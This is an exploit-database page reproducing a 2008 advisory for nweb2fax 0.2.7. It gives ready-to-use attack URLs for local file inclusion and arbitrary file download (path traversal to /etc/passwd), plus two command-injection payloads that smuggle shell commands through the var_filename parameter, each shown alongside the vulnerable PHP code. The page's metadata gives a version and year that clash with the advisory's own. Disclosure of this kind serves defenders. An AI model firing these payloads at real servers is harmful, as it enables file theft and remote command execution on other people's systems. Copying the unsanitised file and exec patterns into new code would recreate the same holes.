header-logo
Suggest Exploit
vendor:
nweb2fax
by:
dun
8.8
CVSS
HIGH
Local File Inclusion, Arbitrary File Download, Remote Command Execution
22, 434, 78
CWE
Product Name: nweb2fax
Affected Version From: 2000.2.7
Affected Version To: 2000.2.7
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

nweb2fax <= 0.2.7 Multiple Remote Vulnerabilities

nweb2fax is vulnerable to multiple remote vulnerabilities. The first vulnerability is a Local File Inclusion vulnerability which allows an attacker to read any file on the server. The second vulnerability is an Arbitrary File Download vulnerability which allows an attacker to download any file from the server. The third vulnerability is a Remote Command Execution vulnerability which allows an attacker to execute arbitrary commands on the server.

Mitigation:

Upgrade to the latest version of nweb2fax, disable the script if not in use, and restrict access to the script.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##################################################################
 #  [  nweb2fax <= 0.2.7   Multiple Remote Vulnerabilities  ]     #
 ##################################################################
 #
 # Script site:  http://sourceforge.net/projects/nweb2fax/
 # 
 # [ Local File Inclusion Vulnerability ]:
 #  *** /comm.php?id=../../../../../../../../../../etc/passwd
 #
 # Bug:
 #
 # ...
 # $var_id=$_GET['id'];
 # $fileary = file ( "$DIR_SPOOL/log/c$var_id" );
 # reset($fileary);
 # foreach ($fileary as $line) {
 # 	if( trim($line) != "" ){
 # 		print "<br>$line";
 # 	}
 # }
 # ...
 #
 #
 # [ Arbitrary File Download Vulnerability ]:
 #
*** /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
 #
 # Bug:
 #
 # ...
 # $var_filename=$_GET['var_filename'];
 # $var_format=$_GET['format'];
 # ...
 # if( $var_format == "ps" ) {
 #   $filename = "$DIR_SPOOL/$var_filename";
 #   header("Content-Type: application/postscript");
 #   header('Content-Disposition: attachment;
filename="downloaded.ps"');
 #   readfile("$filename");
 # ...
 #
 #
 # [ Remote Command Execution 1]:
 # *** /viewrq.php?format=tif&var_filename=;id%3E/tmp/id.txt;chmod%
20777%20/tmp/id.txt;
 #
 # Bug:
 # ...
 # $var_filename=$_GET['var_filename'];
 # $var_format=$_GET['format'];
 # ...
 # } elseif ($var_format == "pdf")  {
 # ...
 # $recvq_filename = "$DIR_SPOOL/$var_filename";
 # ...
 # exec("$PROG_TIFF2PS -a -O $FILE_TMP1 $recvq_filename",$exec_output,
$exec_return);
 # ...
 # 
 #
 # [ Remote Command Execution 2]:
 # *** /viewrq.php?format=pdf&var_filename=;id%3E/tmp/id2.txt;chmod%
20777%20/tmp/id2.txt;id
 #      
 # Bug:
 # ...
 # $var_filename=$_GET['var_filename'];
 # $var_format=$_GET['format'];
 # ...
 # } elseif ($var_format == "pdf")  {
 # ...
 # $recvq_filename = "$DIR_SPOOL/$var_filename";
 # ...
 #  $cmd="$PROG_CAT $recvq_filename | $PROG_GS $gs_options";
 # ...
 #  exec($cmd,$exec_output,$exec_return);
 # ...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
 ###############################################

 [ dun / 2008 ] 

# milw0rm.com [2008-06-18]

Navigation

Suggest Exploit

Services By CQR